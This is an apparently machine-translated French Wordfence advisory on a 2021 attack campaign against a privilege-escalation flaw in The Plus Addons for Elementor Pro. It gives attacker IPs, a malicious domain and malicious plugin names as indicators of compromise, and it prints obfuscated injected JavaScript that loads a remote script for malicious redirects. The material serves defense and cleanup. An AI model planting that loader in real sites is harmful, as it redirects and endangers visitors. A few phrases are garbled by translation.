Au cours des 10 derniers jours, Wordfence a bloqué plus de 14 millions d’attaques ciblant Vulnérabilités d’escalade de privilèges dans les modules complémentaires Plus pour Elementor Pro sur plus de 75% des sites signalant des attaques au cours de cette période. Au 13 avril 2021, cette campagne ciblait plus de sites que toutes les autres campagnes réunies.
Nombre de sites attaqués par jour
Bien que le nombre d’installations ne soit estimé qu’à environ 30 000 sites, dont près de 60% devraient désormais exécuter une version corrigée du plugin, plus de 2,8 millions de sites protégés par Wordfence ont été ciblés par cette campagne depuis le 8 avril 2021. Il est probable que ces chiffres sont reflétés par l’ensemble de l’écosystème WordPress et que des millions de sites qui ne sont pas protégés par Wordfence sont également attaqués.
La vulnérabilité d’origine était déjà activement attaquée lorsqu’elle a été signalée par la société d’hébergement Seravo, ce qui en fait un jour 0 à l’époque. Cette vulnérabilité permettait aux attaquants de se connecter en tant qu’administrateur ou de créer de nouveaux comptes administratifs sur n’importe quel site avec le plugin installé. Lors de l’analyse du plugin, l’équipe de Wordfence Threat Intelligence a trouvé des vulnérabilités supplémentaires et a notifié le développeur du plugin. Une règle de pare-feu protégeant contre ces vulnérabilités a été publiée pour nos utilisateurs premium le 8 mars 2021 et est devenue disponible pour les utilisateurs gratuits le 7 avril 2021.
Notez que ce n’est pas la même vulnérabilité que le Vulnérabilités généralisées de Contributor + XSS dans divers modules d’extension Elementor dont nous avons récemment rendu compte, bien que ce plugin ait également été affecté par ces vulnérabilités.
Un attaquant familier qui monte pour le printemps
Ces attaques font partie d’un schéma plus large que nous avons vu d’attaques s’intensifiant au printemps. La grande majorité des attaques récentes semblent être des campagnes de force brute ou des campagnes ciblant des vulnérabilités plus anciennes. La deuxième campagne d’attaque la plus répandue de la semaine dernière vise une vulnérabilité dans Slider Revolution qui a été corrigée en 2014, ainsi que quelques tentatives supplémentaires pour extraire des informations sensibles des fichiers du site Web wp-config.php. De plus en plus d’attaques récentes semblent ne pas être ciblées, ce qui peut indiquer que l’infrastructure utilisée pour effectuer les attaques est devenue moins coûteuse à exploiter pour les attaquants.
Cette campagne est remarquable en ce qu’elle cible une vulnérabilité récente et, par conséquent, a plus de chances de succès que les autres campagnes que nous avons vues récemment. Nous estimons qu’au moins 10 000 sites sont encore vulnérables. Il est également inhabituel en ce qu’il s’agit d’un ensemble d’attaques soutenues, alors que les pics d’attaque que nous avons vus dans le passé n’ont généralement duré que quelques jours avant de s’atténuer. Cela peut indiquer que les attaquants gardent le contrôle des hôtes utilisés pour effectuer des attaques plus longtemps, ou qu’ils sont moins préoccupés par le maintien d’un profil bas.
L’ajout post-exploitation de JavaScript effectuant des redirections malveillantes est particulièrement troublant. Nous pensons que l’acteur de la menace qui attaque ces vulnérabilités est le le même cette nous avons rendu compte de l’année dernière en raison de l’ampleur des attaques et de la MO post-exploitation. Alors que d’autres attaquants dotés de capacités similaires sont apparus depuis lors, la chaîne de redirection et les faux modèles de «statistiques» utilisés dans les domaines de redirection sont des indicateurs forts qu’il s’agit du même attaquant.
Indicateurs de compromis
Nous surveillons de près les données d’attaque associées à la campagne en cours ainsi que les nettoyages de notre site résultant de cette vulnérabilité. Si votre site a été compromis et que vous savez que le plugin est installé, voici quelques-uns des indicateurs courants de compromis que nous constatons.
Adresses e-mail courantes utilisées pour l’enregistrement
test@example.com – Presque toutes les tentatives que nous avons vues utilisent cette adresse e-mail pour les utilisateurs administrateurs nouvellement générés. Nous avons bloqué plus de 14 millions de tentatives d’enregistrement avec cette adresse e-mail tout en essayant d’exploiter la vulnérabilité.
Principales adresses IP que nous avons bloquées en essayant d’exploiter ces vulnérabilités
Ces attaques ont été étonnamment concentrées, avec seulement 38 adresses IP responsables collectivement de la majorité des attaques. Chacune des adresses IP suivantes a attaqué plus de 10 000 sites sur notre réseau.
208.110.85.68173.208.246.46173.208.246.43198.204.240.24251.15.146.61192.151.156.18863.141.251.237107.150.59.245208.110.85.70107.150.52.19669.30.225.10169.197.185.132192.151.156.190107.150.52.198192.151.156.189107.150.63.173107.150.63.17269.197.185.13369.30.225.98198.204.240.246107.150.52.197107.150.59.24363.141.251.238107.150.59.230192.151.156.18763.141.251.23569.197.185.131107.150.59.246107.150.59.229107.150.60.36107.150.60.37198.204.240.244173.208.246.45107.150.59.244198.204.240.245198.204.240.243
Noms de domaine que nous avons trouvés injectés dans les bases de données de sites infectés.
hXXps://store.dontkinhooot.tw/stat.js
Exemple de code que nous voyons injecté dans des fichiers JavaScript.
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;
(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116));
elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);
elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);
elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);
elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);
document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Plugins malveillants courants que nous voyons installés.
/wpstaff/wpstaff.php/wp-strongs/wp-strongs.php
Veuillez noter que vous ne pourrez peut-être pas voir ces plugins installés répertoriés sur la page des plugins car ils peuvent inclure du code qui les masque du tableau de bord wp-admin de votre site. Il est important de vérifier la présence de ces plugins en accédant au système de fichiers de votre site sous le /wp-content/plugins annuaire.
Que devrais tu faire
Si vous n’avez pas encore mis à jour The Plus Addons for Elementor Pro, nous vous recommandons vivement de le faire immédiatement pour vous assurer que votre site est protégé contre les compromis.
Si votre site a été compromis en raison de cette vulnérabilité, vous disposez de quelques options pour restaurer votre site.
Option n ° 1: restaurer à partir de la sauvegarde
C’est le moyen le plus simple de restaurer votre site s’il a été compromis. En examinant les journaux de votre site et Wordfence Live Traffic, vous pourrez peut-être déterminer la date et l’heure initiales de l’infection. Une fois que vous avez déterminé la date et l’heure initiales de l’infection, vous voudrez choisir une sauvegarde plus ancienne que l’heure de l’infection.
Si vous ne parvenez pas à déterminer la date initiale du compromis pour choisir une sauvegarde viable à partir de laquelle effectuer la restauration, nous vous recommandons de restaurer votre site à partir de cette sauvegarde antérieure au 1er mars 2021. Une fois que vous avez restauré votre site à partir de l’arrière- vers le haut, puis exécutez une analyse Wordfence haute sensibilité pour vérifier qu’aucun résidu de malware ne reste sur votre site. De plus, une fois que vous avez terminé la restauration à partir d’une sauvegarde, assurez-vous de mettre à jour tous vos plugins et thèmes immédiatement après la restauration d’une copie propre afin que votre site ne soit pas réinfecté par la même vulnérabilité.
Option 2: Effectuer manuellement le nettoyage de votre site
Si vous ne disposez pas d’une sauvegarde de votre site, vous devrez peut-être effectuer vous-même manuellement le nettoyage du site.
Nous avons expliqué comment nettoyer un site compromis par le piratage The Plus Addons Elementor sur Wordfence Live, mardi 16 mars. Vous pouvez regarder cette vidéo pour un guide étape par étape pour récupérer votre site WordPress.
Option 3 Embaucher un professionnel
Si vous ne vous sentez pas à l’aise pour effectuer vous-même le nettoyage du site ou si vous avez la possibilité de restaurer à partir d’une sauvegarde, alors c’est parfaitement normal. Dans ce cas, nous vous recommandons de faire appel à un professionnel pour effectuer le nettoyage du site. Wordfence offre un excellent service de nettoyage de site pour 490 $ qui comprend une année gratuite de Wordfence premium pour améliorer la protection de votre site. Vous pouvez en savoir plus sur ce service ici.
Conclusion
Dans l’article d’aujourd’hui, nous avons couvert une campagne d’attaque en cours contre un ensemble de vulnérabilités critiques dans The Plus Addons for Elementor Pro. Ces vulnérabilités ont été corrigées dans la version 4.1.7, et tous les sites exécutant Wordfence, y compris la version gratuite, sont protégés contre ces attaques. Néanmoins, nous vous encourageons vivement à mettre à jour ce plugin si vous l’avez installé sur votre site, et à contacter tous les amis ou collègues qui pourraient utiliser ce plugin car cette vulnérabilité est activement attaquée et peut être utilisée pour prendre complètement le contrôle d’un site avec effort minimal de la part de l’attaquant.
Un merci spécial à l’analyste des menaces Chloe Chamberland pour son aide à la rédaction et à la fourniture de données pour cet article.
Source link